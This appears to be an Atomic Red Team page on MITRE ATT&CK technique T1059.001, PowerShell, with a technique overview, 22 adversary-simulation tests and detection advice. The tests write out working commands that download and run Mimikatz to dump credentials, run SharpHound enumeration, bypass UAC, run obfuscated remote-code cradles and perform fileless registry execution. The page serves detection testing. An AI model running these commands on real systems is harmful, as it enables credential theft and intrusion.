Ctrl+K

T1059.001 - PowerShell

Contents

T1059.001 - PowerShell#

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.(Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell’s underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)

Atomic Tests#

Atomic Test #1 - MimikatzDownload Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.#

Supported Platforms: windows Elevation Required (e.g. root or admin)#### Attack Commands: Run with command_prompt

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Invoke-AtomicTest T1059.001 -TestNumbers 1

Atomic Test #2 - Run BloodHound from local disk#

Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.

Successful execution will produce stdout message stating “SharpHound Enumeration Completed”. Upon completion, final output will be a *BloodHound.zip file.

Supported Platforms: windows

Dependencies: Run with powershell!#

Description: SharpHound.ps1 must be located at “PathToAtomicsFolder..\ExternalPayloads\SharpHound.ps1”#
Check Prereq Commands:#
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1") {exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"

Invoke-AtomicTest T1059.001 -TestNumbers 2 -GetPreReqs

Attack Commands: Run with powershell#

import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5

Invoke-AtomicTest T1059.001 -TestNumbers 2

Cleanup:#

Remove-Item $env:Temp\*BloodHound.zip -Force

Invoke-AtomicTest T1059.001 -TestNumbers 2 -Cleanup

Atomic Test #3 - Run Bloodhound from Memory using Download CradleUpon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur.#

Successful execution will produce stdout message stating “SharpHound Enumeration Completed”. Upon completion, final output will be a *BloodHound.zip file. Supported Platforms: windows#### Attack Commands: Run with powershell

write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5

Invoke-AtomicTest T1059.001 -TestNumbers 3

Cleanup:#

Remove-Item $env:Temp\*BloodHound.zip -Force

Invoke-AtomicTest T1059.001 -TestNumbers 3 -Cleanup

Atomic Test #4 - Obfuscation TestsDifferent obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: “SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION”#

Supported Platforms: windows#### Attack Commands: Run with powershell

(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))

Invoke-AtomicTest T1059.001 -TestNumbers 4

Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeysRun mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.#

Supported Platforms: windows Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell

$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr

Invoke-AtomicTest T1059.001 -TestNumbers 5

Atomic Test #6 - Invoke-AppPathBypassNote: Windows 10 only. Upon execution windows backup and restore window will be opened.#

Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ Supported Platforms: windows#### Attack Commands: Run with command_prompt

Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"

Invoke-AtomicTest T1059.001 -TestNumbers 6

Atomic Test #7 - Powershell MsXml COM object - with promptPowershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, “Download Cradle test success!” will be displayed.#

Provided by mgreen27/mgreen27.github.io Supported Platforms: windows#### Attack Commands: Run with command_prompt

powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"

Invoke-AtomicTest T1059.001 -TestNumbers 7

Atomic Test #8 - Powershell XML requestsPowershell xml download request. Upon execution, “Download Cradle test success!” will be dispalyed.#

Provided by mgreen27/mgreen27.github.io Supported Platforms: windows#### Attack Commands: Run with command_prompt

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX"

Invoke-AtomicTest T1059.001 -TestNumbers 8

Atomic Test #9 - Powershell invoke mshta.exe downloadPowershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display “Download Cradle test success!”.#

Provided by mgreen27/mgreen27.github.io Supported Platforms: windows#### Attack Commands: Run with command_prompt

C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()"

Invoke-AtomicTest T1059.001 -TestNumbers 9

Atomic Test #10 - Powershell Invoke-DownloadCradleProvided by mgreen27/mgreen27.github.io#

Invoke-DownloadCradle is used to generate Network and Endpoint artifacts. Supported Platforms: windowsRun it with these steps!1. Open Powershell_ise as a Privileged Account 2. Invoke-DownloadCradle.ps1

Atomic Test #11 - PowerShell Fileless Script ExecutionExecution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open “C:\Windows\Temp” and verify that#

art-marker.txt is in the folder. Supported Platforms: windows#### Attack Commands: Run with powershell

# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

Invoke-AtomicTest T1059.001 -TestNumbers 11

Cleanup:#

Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore

Invoke-AtomicTest T1059.001 -TestNumbers 11 -Cleanup

Atomic Test #12 - PowerShell Downgrade Attack#

This test requires the manual installation of PowerShell V2.

Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/

Supported Platforms: windows

Dependencies: Run with powershell!#

Description: PowerShell version 2 must be installed#
Check Prereq Commands:#
if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1}
Get Prereq Commands:#
Write-Host  Automated installer not implemented yet, please install PowerShell v2 manually

Invoke-AtomicTest T1059.001 -TestNumbers 12 -GetPreReqs

Attack Commands: Run with powershell#

powershell.exe -version 2 -Command Write-Host $PSVersion

Invoke-AtomicTest T1059.001 -TestNumbers 12

Atomic Test #13 - NTFS Alternate Data Stream Access#

Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, “Stream Data Executed” will be displayed.

Supported Platforms: windows

Dependencies: Run with powershell!#

Description: Homedrive must be an NTFS drive#
Check Prereq Commands:#
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1}
Get Prereq Commands:#
Write-Host Prereq's for this test cannot be met automatically


Invoke-AtomicTest T1059.001 -TestNumbers 13 -GetPreReqs

Attack Commands: Run with powershell#

Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Stream 'streamcommand'
Invoke-Expression $streamcommand

Invoke-AtomicTest T1059.001 -TestNumbers 13

Cleanup:#

Remove-Item $env:TEMP\NTFS_ADS.txt -Force -ErrorAction Ignore

Invoke-AtomicTest T1059.001 -TestNumbers 13 -Cleanup

Atomic Test #14 - PowerShell Session Creation and Use#

Connect to a remote powershell session and interact with the host. Upon execution, network test info and ‘T1086 PowerShell Session Creation and Use’ will be displayed.

Supported Platforms: windows

Elevation Required (e.g. root or admin)

Dependencies: Run with powershell!#

Description: PSRemoting must be enabled#
Check Prereq Commands:#
Try {
    New-PSSession -ComputerName $env:COMPUTERNAME -ErrorAction Stop | Out-Null
    exit 0
} 
Catch {
    exit 1
}
Get Prereq Commands:#
Enable-PSRemoting

Invoke-AtomicTest T1059.001 -TestNumbers 14 -GetPreReqs

Attack Commands: Run with powershell#

New-PSSession -ComputerName $env:COMPUTERNAME
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use

Invoke-AtomicTest T1059.001 -TestNumbers 14

Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations#

Executes powershell.exe with variations of the -Command parameter Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.#
Check Prereq Commands:#
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:#
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

Invoke-AtomicTest T1059.001 -TestNumbers 15 -GetPreReqs

Attack Commands: Run with powershell#

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -Execute -ErrorAction Stop```

Invoke-AtomicTest T1059.001 -TestNumbers 15

Atomic Test #16 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments#

Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.#
Check Prereq Commands:#
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:#
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

Invoke-AtomicTest T1059.001 -TestNumbers 16 -GetPreReqs

Attack Commands: Run with powershell#

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -UseEncodedArguments -EncodedArgumentsParamVariation EA -Execute -ErrorAction Stop```

Invoke-AtomicTest T1059.001 -TestNumbers 16

Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations#

Executes powershell.exe with variations of the -EncodedCommand parameter Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.#
Check Prereq Commands:#
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:#
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

Invoke-AtomicTest T1059.001 -TestNumbers 17 -GetPreReqs

Attack Commands: Run with powershell#

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -Execute -ErrorAction Stop```

Invoke-AtomicTest T1059.001 -TestNumbers 17

Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments#

Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied Supported Platforms: windows

Dependencies: Run with powershell!#

Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.#
Check Prereq Commands:#
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:#
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

Invoke-AtomicTest T1059.001 -TestNumbers 18 -GetPreReqs

Attack Commands: Run with powershell#

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop```

Invoke-AtomicTest T1059.001 -TestNumbers 18

Atomic Test #19 - PowerShell Command ExecutionUse of obfuscated PowerShell to execute an arbitrary command; outputs “Hello, from PowerShell!”. Example is from the 2021 Threat Detection Report by Red Canary.#

Supported Platforms: windows#### Attack Commands: Run with command_prompt

powershell.exe -e  JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==

Invoke-AtomicTest T1059.001 -TestNumbers 19

Atomic Test #20 - PowerShell Invoke Known Malicious CmdletsPowershell execution of known Malicious PowerShell CmdletsSupported Platforms: windows#

Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell

$malcmdlets = "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"

foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}

Invoke-AtomicTest T1059.001 -TestNumbers 20

Atomic Test #21 - PowerUp Invoke-AllChecksCheck for privilege escalation paths using PowerUp from PowerShellMafia#

Supported Platforms: windows#### Attack Commands: Run with powershell

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks

Invoke-AtomicTest T1059.001 -TestNumbers 21

Atomic Test #22 - Abuse Nslookup with DNS RecordsRed teamer’s avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.#

reference Supported Platforms: windows#### Attack Commands: Run with powershell

# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]

Invoke-AtomicTest T1059.001 -TestNumbers 22

Detection#

If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.

Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)

It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.

Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential Downgrade Attack) as well as if PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.(Citation: inv_ps_attacks)

Contents